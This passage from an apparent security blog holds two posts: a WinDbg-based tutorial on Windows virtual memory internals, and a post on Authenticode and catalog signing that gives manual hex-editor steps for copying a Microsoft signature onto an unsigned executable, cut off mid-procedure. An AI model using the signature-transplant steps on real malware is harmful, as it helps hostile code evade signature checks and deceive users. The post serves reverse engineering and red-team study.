    Of course, in reality we know that it can't work that way. If we use one process to write to a virtual memory address, and then use another process to read from that address, we shouldn't get the same value. That would be devastating from a security and stability standpoint. In fact, the same permissions may not even be applied to that virtual memory in both processes.

    But how does Windows accomplish this separation? It's actually pretty straightforward: when switching threads in kernel-mode or user-mode (called a context switch), Windows stores off or loads information about the current thread including the state of all of the registers. Because of this, Windows is able to swap out the root of the paging structures when the thread context is switched by changing the value of CR3, effectively allowing it to manage an entirely separate set of paging structures for each process on the system. This gives each process a unique mapping of virtual memory to physical memory, while still using the same virtual address ranges as another process. The PML4 table pointer for each user-mode process is stored in the DirectoryTableBase member of an internal kernel structure called the EPROCESS, which also manages a great deal of other state and metadata about the process.

    Figure 2: In reality, each process has its own set of paging structures, and Windows swaps out the value of the CR3 register when it executes within that process. This allows virtual addresses in each process to map to different physical addresses.

    We can see the paging structure swap between processes for ourselves if we do a little bit of exploration using WinDbg. If you haven't already set up kernel debugging, you should check out this article to get yourself started. Then follow along below.

    Let's first get a list of processes running on the target system. We can do that using the !process command. For more details on how to use this command, consider checking out the documentation using .hh !process. In our case, we pass parameters of zero to show all processes on the system.


    We can use notepad.exe as our target process, but you should be able to follow along with virtually any process of your choice. The next thing we need to do is attach ourselves to this process - simply put, we need to be in this process' context. This lets us access the virtual memory of notepad.exe by remapping the paging structures. We can verify that the context switch is happening by watching what happens to the CR3 register. If the virtual memory we have access to is going to change, we expect that the value of CR3 will change to new paging structures that represent notepad.exe's virtual memory. Let's take a look at the value of CR3 before the context switch.


    We know that this value should change to the DirectoryTableBase member of the EPROCESS structure that represents notepad.exe when we make the switch. As a matter of interest, we can take a look at that structure and see what it contains. The PROCESS fffffa8019218b10 line emitted by the debugger when we listed all processes is actually the virtual address of that process' EPROCESS structure.


    The fully expanded EPROCESS structure is massive, so everything after what we're interested in has been omitted from the results above. We can see, though, that the DirectoryTableBase is a member at +0x028 of the process control block (KPROCESS) structure that's embedded as part of the larger EPROCESS structure.

    According to this output, we should expect that CR3 will change to 0x00000006`52e89000 when we switch to this process' context in WinDbg.

    To perform the context swap, we use the .process command and indicate that we want an invasive swap (/i) which will remap the virtual address space and allow us to do things like set breakpoints in user-mode memory. Also, in order for the process context swap to complete, we need to allow the process to execute once using the g command. The debugger will then break again, and we're officially in the context of notepad.exe.


    Okay! Now that we're in the context we need to be in, let's check the CR3 register to verify that the paging structures have been changed to the DirectoryTableBase member we saw earlier.


    Looks like it worked as we expected. We would find a unique set of paging structures at 0x00000006`52e89000 that represented the virtual to physical address mappings within notepad.exe. This is essentially the same kind of swap that occurs each time Windows switches to a thread in a different process.

    Virtual address ranges

    While each process gets its own view of virtual memory and can re-use the same virtual address range as another process, there are some consistent rules of thumb that Windows abides by when it comes to which virtual address ranges store certain kinds of information.

    To start, each user-mode process is allowed a user-mode virtual address space ranging from 0x000`00000000 to 0x7ff`ffffffff, giving each process a theoretical maximum of 8TB of virtual memory that it can access. Then, each process also has a range of kernel-mode virtual memory that is split up into a number of different subsections. This much larger range gives the kernel a theoretical maximum of 248TB of virtual memory, ranging from 0xffff0800`00000000 to 0xffffffff`ffffffff. The remaining address space is not actually used by Windows, though, as we can see below.


    Figure 3: All possible virtual memory, divided into the different ranges that Windows enforces. The virtual addresses for the kernel-mode regions may not be true on Windows 10, where these regions are subject to address space layout randomization (ASLR). Credits to Alex Ionescu for specific kernel space mappings.

    Currently, there is an extremely large “no man's land” of virtual memory space between the user-mode and kernel-mode ranges of virtual memory. This range of memory isn't wasted, though, it's just not addressable due to the current architecture constraint of 48-bit virtual addresses, which we discussed in our previous article. If there existed a system with 16EB of physical memory - enough memory to address all possible 64-bit virtual memory - the extra physical memory would simply be used to hold the pages of other processes, so that many processes' memory ranges could be resident in physical memory at once.

    As an aside, one other interesting property of the way Windows handles virtual address mapping is being able to quickly tell kernel pointers from user-mode pointers. Memory that is mapped as part of the kernel has the highest order bits of the address (the 16 bits we didn't use as part of the linear address translation) set to 1, while user-mode memory has them set to 0. This ensures that kernel-mode pointers begin with 0xFFFF and user-mode pointers begin with 0x0000.

    A tree of virtual memory: the VAD

    We can see that the kernel-mode virtual memory is nicely divided into different sections. But what about user-mode memory? How does the memory manager know which portions of virtual memory have been allocated, which haven't, and details about each of those ranges? How can it know if a virtual address within a process is valid or invalid? It could walk the process' paging structures to figure this out every time the information was needed, but there is another way: the virtual address descriptor (VAD) tree.

    Each process has a VAD tree that can be located in the VadRoot member of the aforementioned EPROCESS structure. The tree is a balanced binary search tree, with each node representing a region of virtual memory within the process.

    Figure 4: The VAD tree is balanced with lower virtual page numbers to the left, and each node providing some additional details about the memory range.

    Each node gives details about the range of addresses, the memory protection of that region, and some other metadata depending on the state of the memory it is representing.

    We can use our friend WinDbg to easily list all of the entries in the VAD tree of a particular process. Let's have a look at the VAD entries from notepad.exe using !vad.


    The range of addresses supported by a given VAD entry are stored as virtual page numbers - similar to a PFN, but simply in virtual memory. This means that an entry representing a starting VPN of 0x7f and an ending VPN of 0x8f would actually be representing virtual memory from address 0x00000000`0007f000 to 0x00000000`0008ffff.

    There are a number of complexities of the VAD tree that are outside the scope of this article. For example, each node in the tree can be one of three different types depending on the state of the memory being represented. In addition, a VAD entry may contain information about the backing PTEs for that region of memory if that memory is shared. We will touch more on that concept in a later section.

    Let's get physical

    So we now know that Windows maintains separate paging structures for each individual process, and some details about the different virtual memory ranges that are defined. But the operating system also needs a central mechanism to keep track of each individual page of physical memory. After all, it needs to know what's stored in each physical page, whether it can write that data out to a paging file on disk to free up memory, how many processes are using that page for the purposes of shared memory, and plenty of other details for proper memory management

    That's where the page frame number (PFN) database comes in. A pointer to the base of this very large structure can be located at the symbol nt!MmPfnDatabase, but we know based on the kernel-mode memory ranges that it starts at the virtual address 0xfffffa80`00000000, except on Windows 10 where this is subject to ASLR. (As an aside, WinDbg has a neat extension for dealing with the kernel ASLR in Windows 10 - !vm 0x21 will get you the post-KASLR regions). For each physical page available on the system, there is an nt!_MMPFN structure allocated in the database to provide details about the page.

    Figure 5: Each physical page in the system is represented by a PFN entry structure in this very large, contiguous data structure.

    Though some of the bits of the nt!_MMPFN structure can vary depending on the state of the page, that structure generally looks something like this:


    A page represented in the PFN database can be in a number of different states. The state of the page will determine what the memory manager does with the contents of that page.

    We won't be focusing on the different states too much in this article, but there are a few of them: active, transition, modified, free, and bad, to name several. It is definitely worth mentioning that for efficiency reasons, Windows manages linked lists that are comprised of all of the nt!_MMPFN entries that are in a specific state. This makes it much easier to traverse all pages that are in a specific state, rather than having to walk the entire PFN database. For example, it can allow the memory manager to quickly locate all of the free pages when memory needs to be paged in from disk.

    Figure 6: Different linked lists make it easier to walk the PFN database according to the state of the pages, e.g. walk all of the free pages contiguously.

    Another purpose of the PFN database is to help facilitate the translation of physical addresses back to their corresponding virtual addresses. Windows uses the PFN database to accomplish this during calls such as nt!MmGetVirtualForPhysical. While it is technically possible to search all of the paging structures for every process on the system in order to work backwards up the paging structures to get the original virtual address, the fact that the nt!_MMPFN structure contains a reference to the backing PTE coupled with some clever allocation rules by Microsoft allow them to easily convert back to a virtual address using the PTE and some bit shifting.

    For a little bit of practical experience exploring the PFN database, let's find a region of memory in notepad.exe that we can take a look at. One area of memory that could be of interest is the entry point of our application. We can use the !dh command to display the PE header information associated with a given module in order to track down the address of the entry point.

    Because we've switched into a user-mode context in one of our previous examples, WinDbg will require us to reload our symbols so that it can make sense of everything again. We can do that using the .reload /f command. Then we can look at notepad.exe's headers:


    Again, the output is quite verbose, so the section information at the bottom is omitted from the above snippet. We're interested in the address of entry point member of the optional header, which is listed as 0x3acc. That value is called a relative virtual address (RVA), and it's the number of bytes from the base address of the notepad.exe image. If we add that relative address to the base of notepad.exe, we should see the code located at our entry point.


    And we do see that the address resolves to notepad!WinMainCRTStartup, like we expected. Now we have the address of our target process' entry point: 00000000`ffd53acc.

    While the above steps were a handy exercise in digging through parts of a loaded image, they weren't actually necessary since we had symbols loaded. We could have simply used the ? qualifier in combination with the symbol notepad!WinMainCRTStartup, as demonstrated below, or gotten the value of a handy pseudo-register that represents the entry point with r $exentry.


    In any case, we now have the address of our entry point, which from here on we'll refer to as our “target” or the “target page”. We can now start taking a look at the different paging structures that support our target, as well as the PFN database entry for it.

    Let's first take a look at the PFN database. We know the virtual address where this structure is supposed to start, but let's look for it the long way, anyway. We can easily find the beginning of this structure by using the ? qualifier and poi on the symbol name. The poi command treats its parameter as a pointer and retrieves the value located at that pointer.


    Knowing that the PFN database begins at 0xfffffa80`00000000, we should be able to index easily to the entry that represents our target page. First we need to figure out the page frame number in physical memory that the target's PTE refers to, and then we can index into the PFN database by that number.

    Looking back on what we learned from the previous article, we can grab the PTE information about the target page very easily using the handy !pte command.


    The above result would indicate that the backing page frame number for the target is 0x65207b. That should be the index into the PFN database that we'll need to use. Remember that we'll need to multiply that index by the size of an nt!_MMPFN structure, since we're essentially trying to skip that many PFN entries.


    This looks like a valid PFN entry. We can verify that we've done everything correctly by first doing the manual calculation to figure out what the address of the PFN entry should be, and then comparing it to where WinDbg thinks it should be.


    So based on the above, we know that the nt!_MMPFN entry for the page we're interested in it should be located at 0xfffffa80`12f61710, and we can use a nice shortcut to verify if we're correct. As always in WinDbg, there is an easier way to obtain information from the PFN database. This can be done by using the !pfn command with the page frame number.


    Here we can see that WinDbg also indicates that the PFN entry is at 0xfffffa8012f61710, just like our calculation, so it looks like we did that correctly.

    An interlude about working sets

    Phew - we've done some digging around in the PFN database now, and we've seen how each entry in that database stores some information about the physical page itself. Let's take a step back for a moment, back into the world of virtual memory, and talk about working sets.

    Each process has what's called a working set, which represents all of the process' virtual memory that is subject to paging and is accessible without incurring a page fault. Some parts of the process' memory may be paged to disk in order to free up RAM, or in a transition state, and therefore accessing those regions of memory will generate a page fault within that process. In layman's terms, a page fault is essentially the architecture indicating that it can't access the specified virtual memory, because the PTEs needed for translation weren't found inside the paging structures, or because the permissions on the PTEs restrict what the application is attempting to do. When a page fault occurs, the page fault handler must resolve it by adding the page back into the process' working set (meaning it also gets added back into the process' paging structures), mapping the page back into memory from disk and then adding it back to the working set, or indicating that the page being accessed is invalid.

    Figure 7: An example working set of a process, where some rarely accessed pages were paged out to disk to free up physical memory.

    It should be noted that other regions of virtual memory may be accessible to the process which do not appear in the working set, such as Address Windowing Extensions (AWE) mappings or large pages; however, for the purposes of this article we will be focusing on memory that is part of the working set.

    Occasionally, Windows will trim the working set of a process in response to (or to avoid) memory pressure on the system, ensuring there is memory available for other processes.

    If the working set of a process is trimmed, the pages being trimmed have their backing PTEs marked as “not valid” and are put into a transition state while they await being paged to disk or given away to another process. In the case of a “soft” page fault, the page described by the PTE is actually still resident in physical memory, and the page fault handler can simply mark the PTE as valid again and resolve the fault efficiently. Otherwise, in the case of a “hard” page fault, the page fault handler needs to fetch the contents of the page from the paging file on disk before marking the PTE as valid again. If this kind of fault occurs, the page fault handler will likely also have to alter the page frame number that the PTE refers to, since the page isn't likely to be loaded back into the same location in physical memory that it previously resided in.

    Sharing is caring

    It's important to remember that while two processes do have different paging structures that map their virtual memory to different parts of physical memory, there can be portions of their virtual memory which map to the same physical memory. This concept is called shared memory, and it's actually quite common within Windows. In fact, even in our previous example with notepad.exe's entry point, the page of memory we looked at was shared. Examples of regions in memory that are shared are system modules, shared libraries, and files that are mapped into memory with CreateFileMapping() and MapViewOfFile().

    In addition, the kernel-mode portion of a process' memory will also point to the same shared physical memory as other processes, because a shared view of the kernel is typically mapped into every process. Despite the fact that a view of the kernel is mapped into their memory, user-mode applications will not be able to access pages of kernel-mode memory as Windows sets the UserSupervisor bit in the kernel-mode PTEs. The hardware uses this bit to enforce ring0-only access to those pages.

    Figure 8: Two processes may have different views of their user space virtual memory, but they get a shared view of the kernel space virtual memory.

    In the case of memory that is not shared between processes, the PFN database entry for that page of memory will point to the appropriate PTE in the process that owns that memory.

    Figure 9: When not sharing memory, each process will have PTE for a given page, and that PTE will point to a unique member of the PFN database.

    When dealing with memory that is shareable, Windows creates a kind of global PTE - known as a prototype PTE - for each page of the shared memory. This prototype always represents the real state of the physical memory for the shared page. If marked as Valid, this prototype PTE can act as a hardware PTE just as in any other case. If marked as Not Valid, the prototype will indicate to the page fault handler that the memory needs to be paged back in from disk. When a prototype PTE exists for a given page of memory, the PFN database entry for that page will always point to the prototype PTE.

    Figure 10: Even though both processes still have a valid PTE pointing to their shared memory, Windows has created a prototype PTE which points to the PFN entry, and the PFN entry now points to the prototype PTE instead of a specific process.

    Why would Windows create this special PTE for shared memory? Well, imagine for a moment that in one of the processes, the PTE that describes a shared memory location is stripped out of the process' working set. If the process then tries to access that memory, the page fault handler sees that the PTE has been marked as Not Valid, but it has no idea whether that shared page is still resident in physical memory or not.

    For this, it uses the prototype PTE. When the PTE for the shared page within the process is marked as Not Valid, the Prototype bit is also set and the page frame number is set to the location of the prototype PTE for that page.

    Figure 11: One of the processes no longer has a valid PTE for the shared memory, so Windows instead uses the prototype PTE to ascertain the true state of the physical page.

    This way, the page fault handler is able to examine the prototype PTE to see if the physical page is still valid and resident or not. If it is still resident, then the page fault handler can simply mark the process' version of the PTE as valid again, resolving the soft fault. If the prototype PTE indicates it is Not Valid, then the page fault handler must fetch the page from disk.

    We can continue our adventures in WinDbg to explore this further, as it can be a tricky concept. Based on what we know about shared memory, that should mean that the PTE referenced by the PFN entry for the entry point of notepad.exe is a prototype PTE. We can already see that it's a different address (0xfffff8a0`09e25a00) than the PTE that we were expecting from the !pte command (0xfffff680007fea98). Let's look at the fully expanded nt!_MMPTE structure that's being referenced in the PFN entry.


    We can compare that with the nt!_MMPTE entry that was referenced when we did the !pte command on notepad.exe's entry point.


    It looks like the Prototype bit is not set on either of them, and they're both valid. This makes perfect sense. The shared page still belongs to notepad.exe's working set, so the PTE in the process' paging structures is still valid; however, the operating system has proactively allocated a prototype PTE for it because the memory may be shared at some point and the state of the page will need to be tracked with the prototype PTE. The notepad.exe paging structures also point to a valid hardware PTE, just not the same one as the PFN database entry.

    The same isn't true for a region of memory that can't be shared. For example, if we choose another memory location that was allocated as MEM_PRIVATE, we will not see the same results. We can use the !vad command to give us all of the virtual address regions (listed by virtual page frame) that are mapped by the current process.


    We can take a look at a MEM_PRIVATE page, such as 0x1cf0, and see if the PTE from the process' paging structures matches the PTE from the PFN database.


    As we can see, it does match, with both addresses referring to 0xfffff680`0000e780. Because this memory is not shareable, the process' paging structures are able to manage the hardware PTE directly. In the case of shareable pages allocated with MEM_MAPPED, though, the PFN database maintains its own copy of the PTE.

    It's worth exploring different regions of memory this way, just to see how the paging structures and PFN entries are set up in different cases. As mentioned above, the VAD tree is another important consideration when dealing with user-mode memory as in many cases, it will actually be a VAD node which indicates where the prototype PTE for a given shared memory region resides. In these cases, the page fault handler will need to refer to the process' VAD tree and walk the tree until it finds the node responsible for the shared memory region.

    Figure 12: If the invalid PTE points to the process' VAD tree, a VAD walk must be performed to locate the appropriate _MMVAD node that represents the given virtual memory.

    The FirstPrototypePte member of the VAD node will indicate the starting virtual address of a region of memory that contains prototype PTEs for each shared page in the region. The list of prototype PTEs is terminated with the LastContiguousPte member of the VAD node. The page fault handler must then walk this list of prototype PTEs to find the PTE that backs the specific page that has faulted.

    Figure 13: The FirstPrototypePte member of the VAD node points to a region of memory that has a contiguous block of prototype PTEs that represent shared memory within that virtual address range.

    One more example to bring it all together

    It would be helpful to walk through each of these scenarios with a program that we control, and that we can change, if needed. That's precisely what we're going to do with the memdemo project. You can follow along by compiling the application yourself, or you can simply take a look at the code snippets that will be posted throughout this example.

    To start off, we'll load our memdemo.exe and then attach the kernel debugger. We then need to get a list of processes that are currently running on the system.


    Let's quickly switch back to the application so that we can let it create our initial buffer. To do this, we're simply allocating some memory and then accessing it to make sure it's resident.


    Upon running the code, we see that the application has created a buffer for us (in the current example) at 0x000001fe`151c0000. Your buffer may differ.

    We should hop back into our debugger now and check out that memory address. As mentioned before, it's important to remember to switch back into the process context of memdemo.exe when we break back in with the debugger. We have no idea what context we could have been in when we interrupted execution, so it's important to always do this step.


    When we wrote memdemo.exe, we could have used the __debugbreak() compiler intrinsic to avoid having to constantly switch back to our process' context. It would ensure that when the breakpoint was hit, we were already in the correct context. For the purposes of this article, though, it's best to practice swapping back into the correct process context, as during most live analysis we would not have the liberty of throwing int3 exceptions during the program's execution.

    We can now check out the memory at 0x000001fe`151c0000 using the db command.


    Looks like that was a success - we can even see the 0xff byte that we wrote to it. Let's have a look at the backing PTE for this page using the !pte command.


    That's good news. It seems like the Valid (V) bit is set, which is what we expect. The memory is Writeable (W), as well, which makes sense based on our PAGE_READWRITE permissions. Let's look at the PFN database entry using !pfn for page 0xa1dd0.


    We can see that the PFN entry points to the same PTE structure we were just looking at. We can go to the address of the PTE at 0xffffed00ff0a8e00 and cast it as an nt!_MMPTE.


    We see that it's Valid, Dirty, Accessed, and Writeable, which are all things that we expect. The Accessed bit is set by the hardware when the page table entry is used for translation. If that bit is set, it means that at some point the memory has been accessed because the PTE was used as part of an address translation. Software can reset this value in order to track accesses to certain memory. Similarly, the Dirty bit shows that the memory has been written to, and is also set by the hardware. We see that it's set for us because we wrote our 0xff byte to the page.

    Now let's let the application execute using the g command. We're going to let the program page out the memory that we were just looking at, using the following code:


    Once that's complete, don't forget to switch back to the process context again. We need to do that every time we go back into the debugger! Now let's check out the PTE with the !pte command after the page has been supposedly trimmed from our working set.


    We see now that the PTE is no longer valid, because the page has been trimmed from our working set; however, it has not been paged out of RAM yet. This means it is in a transition state, as shown by WinDbg. We can verify this for ourselves by looking at the actual PTE structure again.


    In the _MMPTE_TRANSITION version of the structure, the Transition bit is set. So because the memory hasn't yet been paged out, if our program were to access that memory, it would cause a soft page fault that would then simply mark the PTE as valid again. If we examine the PFN entry with !pfn, we can see that the page is still resident in physical memory for now, and still points to our original PTE.


    Now let's press g again and let the app continue. It'll create a shared section of memory for us. In order to do so, we need to create a file mapping and then map a view of that file into our process.


    Let's take a look at the shared memory (at 0x000001fe`151d0000 in this example) using db. Don't forget to change back to our process context when you switch back into the debugger.


    And look! There's the 0xff that we wrote to this memory region as well. We're going to follow the same steps that we did with the previous allocation, but first let's take a quick look at our process' VAD tree with the !vad command.


    You can see the first allocation we did, starting at virtual page number 0x1fe151c0. It's a Private region that has the PAGE_READWRITE permissions applied to it. You can also see the shared section allocated at VPN 0x1fe151d0. It has the same permissions as the non-shared region; however, you can see that it's Mapped rather than Private.

    Let's take a look at the PTE information that's backing our shared memory.


    This region, too, is Valid and Writeable, just like we'd expect. Now let's take a look at the !pfn.


    We see that the Share Count now actually shows us how many times the page has been shared, and the page also has the Shared property. In addition, we see that the PTE address referenced by the PFN entry is not the same as the PTE that we got from the !pte command. That's because the PFN database entry is referencing a prototype PTE, while the PTE within our process is acting as a hardware PTE because the memory is still valid and mapped in.

    Let's take a look at the PTE structure that's in our process' paging structures, that was originally found with the !pte command.


    We can see that it's Valid, so it will be used by the hardware for address translation. Let's see what we find when we take a look at the prototype PTE being referenced by the PFN entry.


    This PTE is also valid, because it's representing the true state of the physical page. Something interesting to note, though, is that you can see that the Dirty bit is not set. Because this bit is only set by the hardware in the context of whatever process is doing the writing, you can theoretically use this bit to actually detect which process on a system wrote to a shared memory region.

    Now let's run the app more and let it page out the shared memory using the same technique we used with the private memory. Here's what the code looks like:


    Let's take a look at the memory with db now.


    We see now that it's no longer visible in our process. If we do !pte on it, let's see what we get.


    The PTE that's backing our page is no longer valid. We still get an indication of what the page permissions were, but the PTE now tells us to refer to the process' VAD tree in order to get access to the prototype PTE that contains the real state. If you recall from when we used the !vad command earlier in our example, the address of the VAD node for our shared memory is 0xffffa50d`d2313a20. Let's take a look at that memory location as an nt!_MMVAD structure.


    The FirstPrototypePte member contains a pointer to a location in virtual memory that stores contiguous prototype PTEs for the region of memory represented by this VAD node. Since we only allocated (and subsequently paged out) one page, there's only one prototype PTE in this list. The LastContiguousPte member shows that our prototype PTE is both the first and last element in the list. Let's take a look at this prototype PTE as an nt!_MMPTE structure.


    We can see that the prototype indicates that the memory is no longer valid. So what can we do to force this page back into memory? We access it, of course. Let's let the app run one more step so that it can try to access this memory again.


    Remember to switch back into the context of the process after the application has executed the next step, and then take a look at the PTE from the PFN entry again.


    Looks like it's back, just like we expected!

    Exhausted yet? Compared to the 64-bit paging scheme we talked about in our last article, Windows memory management is significantly more complex and involves a lot of moving parts. But at it's core, it's not too daunting. Hopefully, now with a much stronger grasp of how things work under the hood, we can put our memory management knowledge to use in something practical in a future article.

    If you're interested in getting your hands on the code used in this article, you can check it out on GitHub and experiment on your own with it.


    Further reading and attributions

    Consider picking up a copy of "Windows Internals, 7th Edition" or "What Makes It Page?" to get an even deeper dive on the Windows virtual memory manager. 

    Thank you to Alex Ionescu for additional tips and clarification. Thanks to irqlnotdispatchlevel for pointing out an address miscalculation.

    Application of Authenticode Signatures to Unsigned Code

    28 August 2017 at 12:31
    Attackers have been known to apply legitimate digital certificates to their malware, presumably, to evade basic signature validation utilities. This was the case with the Petya ransomware. As a reverse engineer or red team capability developer, it is important to know the methods in which legitimate signatures can be applied to otherwise unsigned, attacker-supplied code. This blog post will give some background on code signing mechanisms, digital signature binary formats, and finally, techniques describing the application of digital certificates to an unsigned PE file. Soon, you will also see why these techniques are even more relevant in research that I will be releasing next month.

    Background


    What does it mean for a PE file (exe, dll, sys, etc.) to be signed? The simple answer to many is to open up the file properties on a PE and if a “Digital Signatures” tab is present, it means it was signed. When you see that the “Digital Signatures” tab is present on a file, it actually means that the PE file was Authenticode signed, which means within the file itself there is a binary blob of data consisting of a certificate and a signed hash of the file (more specifically, the Authenticode hash which doesn’t consider certain parts of the PE header in the hash calculation). The format in which an Authenticode signature is stored is documented in the PE Authenticode specification.


    Many files that one would expect to be signed, however, (for example, consider notepad.exe) do not have a “Digital Signatures” tab. Does this mean that the file isn’t signed and that Microsoft is actually shipping unsigned code? Well, it depends. While notepad.exe does not have an Authenticode signature embedded within itself, in reality, it was signed via another means - catalog signing. Windows contains a catalog store consisting of many catalog files that are basically just a list of Authenticode hashes. Each catalog file is then signed to attest that any files with matching hashes originated from the signer of the catalog file (which is Microsoft in almost all cases). So while the Explorer UI does not attempt to lookup catalog signatures, pretty much any other signature verification tool will perform catalog lookups - e.g. Get-AuthenticodeSignature in PowerShell and Sysinternals Sigcheck.

    Note: The catalog file store is located in %windir%\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}



    In the above screenshot, the SignatureType property indicates that notepad.exe is catalog signed. What is also worth noting is the IsOSBinary property. While the implementation is not documented, this will show “True” if a signature chains to one of several known, hashed Microsoft root certificates. Those interested in learning more about how this works should reverse the CertVerifyCertificateChainPolicy function.

    Sigcheck with the “-i” switch will perform catalog certificate validation and also display the catalog file path that contains the matching Authenticode hash. The “-h” switch will also calculate and display the SHA1 and SHA256 Authenticode hashes of the PE file (PESHA1 and PE256, respectively):

    sigcheck -q -h -i C:\Windows\System32\notepad.exe

    c:\windows\system32\notepad.exe:

      Verified:       Signed

      Catalog:        C:\WINDOWS\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-shell~31bf3856ad364e35~amd64~~10.0.15063.0.cat

      Signers:

        Microsoft Windows

          Status:         Valid

          Valid Usage:    NT5 Crypto, Code Signing

          Serial Number:  33 00 00 01 06 6E C3 25 C4 31 C9 18 0E 00 00 00 00 01 06

          Thumbprint:     AFDD80C4EBF2F61D3943F18BB566D6AA6F6E5033

          Algorithm:      1.2.840.113549.1.1.11

          Valid from:     1:39 PM 10/11/2016

          Valid to:       1:39 PM 1/11/2018

        Microsoft Windows Production PCA 2011

          Status:         Valid

          Valid Usage:    All

          Serial Number:  61 07 76 56 00 00 00 00 00 08

          Thumbprint:     580A6F4CC4E4B669B9EBDC1B2B3E087B80D0678D

          Algorithm:      1.2.840.113549.1.1.11

          Valid from:     11:41 AM 10/19/2011

          Valid to:       11:51 AM 10/19/2026

        Microsoft Root Certificate Authority 2010

                    Status:         Valid

                    Valid Usage:    All

                    Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A

                                    9B 58 6B 43 39 AA

                    Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5

                    Algorithm:      1.2.840.113549.1.1.11

                    Valid from:     2:57 PM 6/23/2010

                    Valid to:       3:04 PM 6/23/2035

        Signing date:   1:02 PM 3/18/2017

        Counter Signers:

          Microsoft Time-Stamp Service

            Status:         Valid

            Valid Usage:    Timestamp Signing

            Serial Number:  33 00 00 00 B3 39 BB D4 12 93 15 A9 FE 00 00 00 00 00 B3

            Thumbprint:     BEF9C1F4DA0F153FF0900303BE78A59ADA8ADCB9

            Algorithm:      1.2.840.113549.1.1.11

            Valid from:     10:56 AM 9/7/2016

            Valid to:       10:56 AM 9/7/2018

          Microsoft Time-Stamp PCA 2010

            Status:         Valid

            Valid Usage:    All

            Serial Number:  61 09 81 2A 00 00 00 00 00 02

            Thumbprint:     2AA752FE64C49ABE82913C463529CF10FF2F04EE

            Algorithm:      1.2.840.113549.1.1.11

            Valid from:     2:36 PM 7/1/2010

            Valid to:       2:46 PM 7/1/2025

          Microsoft Root Certificate Authority 2010

            Status:         Valid

            Valid Usage:    All

            Serial Number:  28 CC 3A 25 BF BA 44 AC 44 9A 9B 58 6B 43 39 AA

            Thumbprint:     3B1EFD3A66EA28B16697394703A72CA340A05BD5

            Algorithm:      1.2.840.113549.1.1.11

            Valid from:     2:57 PM 6/23/2010

            Valid to:       3:04 PM 6/23/2035

        Publisher:      Microsoft Windows

        Description:    Notepad

        Product:        Microsoft« Windows« Operating System

        Prod version:   10.0.15063.0

        File version:   10.0.15063.0 (WinBuild.160101.0800)

        MachineType:    64-bit

        MD5:    F60A9D3A9461F68DE0FCCEBB0C6CB31A

        SHA1:   2302BA58181F3C4E1E44A47A7D214EE9397CF2BA

        PESHA1: ACCE8ADCE9DDDE507EAE295DBB37683CA272DB9E

        PE256:  0C67E3923EDA8154A89ADCA8A6BF47DF7C07D40BB41963DEB16ACBCF2E54803E

        SHA256: C84C361B7F5DBAEAC93828E60D2B54704D3E7CA84148BAFDA632F9AD6CDC96FA

        IMP:    645E8D8B0AEA808FF16DAA70D6EE720E


    Knowing the Authenticode hash allows you to look up the respective entry in the catalog file. You can double-click a catalog file to view its entries. I also wrote the CatalogTools PowerShell module to parse catalog files. The “hint” metadata field gives away that notepad.exe is indeed the corresponding entry:


    Digital Signature Binary Format


    Now that you have an understanding of the methods in which a PE file can be signed (Authenticode and catalog), it is useful to have some background on the binary format of signatures. Whether Authenticode signed or catalog signed, both signatures are stored as PKCS #7 signed data which is ASN.1 formatted binary data. ASN.1 is simply a standard that states how binary data of different data types should be stored. Before observing/parsing the bytes of a digital signature, you must first know how it is stored in the file. Catalog files are straightforward as the file itself consists of raw PKCS #7 data. There are online ASN.1 decoders that parse out ASN.1 data and present it in an intuitive fashion. For example, try loading the catalog file containing the hash for notepad.exe into the decoder and you will get a sense of the layout of the data. Here’s a snippet of the parsed output:


    Each property within the ASN.1 encoded data begins with an object identifier (OID) - a unique numeric sequence that identifies the type of data that follows. The OIDs worth noting in the above snippet are the following:
    1. 1.2.840.113549.1.7.2 - This indicates that what follows is PKCS #7 signed data - the format expected for Authenticode and catalog-signed code.
    2. 1.3.6.1.4.1.311.12.1.1 - This indicates that what follows is catalog file hash data
    It is worth spending time exploring all of the fields contained within a digital signature. All fields present are outside of the scope of this blog post, however. Additional crypto/signature-related OIDs are listed here.

    Embedded PE Authenticode Signature Retrieval


    The digital signature data in a PE file with an embedded Authenticode signature is appended to the end of the file (in a well-formatted PE file). The OS obviously needs a little bit more information than that though in order to retrieve the exact offset and size of the embedded signature. Let’s look at kernel32.dll in one of my favorite PE parsing/editing utilities: CFF Explorer.


    The offset and size of the embedded digital signature is stored in the “security directory” offset within the “data directories” array within the optional header. The data directory contains offsets and size of various structures within the PE file - exports, imports, relocations, etc. All offsets within the data directory are relative virtual offsets (RVA) meaning they are the offset to the respective portion of the PE when loaded in memory. There is one exception though - the security directory which stores its offset as a file offset. The reason for this is because the Windows loader doesn’t actually load the content of the security directory in memory.

    The binary data in the at the security directory file offset is a WIN_CERTIFICATE structure. Here’s what the structure for kernel32.dll looks like parsed out in 010 Editor (file offset 0x000A9600):


    PE Authenticode signatures should always have a wRevision of WIN_CERT_TYPE_PKCS_SIGNED_DATA. The byte array that follows is the same PKCS #7, ASN.1 encoded signed data as was seen in the contents of a catalog file. The only difference is that you shouldn’t find the 1.3.6.1.4.1.311.12.1.1 OID, indicating the presence of catalog hashes.

    Parsing out the raw bCertificate data in the online ASN.1 decoder confirms we’re dealing with proper PKCS #7 data:

    Application of Digital Signatures to Unsigned PEs


    Now that you have a basic idea of the binary format and storage locations of digital signatures, you can start applying existing signatures to your unsigned code.

    Application of Embedded Authenticode Signatures


    Applying an embedded Authenticode signature from a signed file to an unsigned PE file is quite straightforward. While the process can obviously be automated, I’m going to explain how to do it manually with a hex editor and CFF Explorer.

    Step #1: Identify the Authenticode signature that you want to steal. In this example, I will use the one in kernel32.dll

    Step #2: Identify the offset and size of the WIN_CERTIFICATE structure in the “security directory”


    So the file offset in the above screenshot is 0x000A9600 and the size is 0x00003A68.

    Step #3: Open kernel32.dll in a hex editor, select 0x3A68 bytes starting at offset 0xA9600, and then copy the bytes.


    Step #4: Open your unsigned PE (HelloWorld.exe in this example) in a hex editor, scroll to the end, and paste the bytes copied from kernel32.dll. Take note of the file offset of the beginning of the signature (0x00000E00 in my case). Save the file after pasting in the signature.


